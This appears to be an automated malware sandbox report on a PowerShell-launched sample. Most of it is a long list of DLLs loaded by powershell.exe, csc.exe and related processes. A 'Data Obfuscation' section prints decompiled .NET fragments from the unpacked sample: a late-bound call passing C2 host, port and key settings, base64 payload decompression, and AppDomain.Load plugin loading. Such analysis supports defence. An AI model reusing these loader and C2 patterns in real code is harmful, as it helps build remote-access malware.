              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\forfiles.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: BeginSync.lnk.1.drLNK file: ..\..\..\Windows\System32\forfiles.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.pdbhP source: powershell.exe, 00000001.00000002.1897623908.0000020A9BC1D000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: n.pDB source: powershell.exe, 00000001.00000002.1929630337.0000020AB294E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.pdb source: powershell.exe, 00000001.00000002.1897623908.0000020A9BC1D000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Messages.cs.Net Code: Memory
              Binary or sample is protected by dotNetProtector
              Source: powershell.exe, 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: dotNetProtector
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: dotNetProtector
              Suspicious powershell command line found
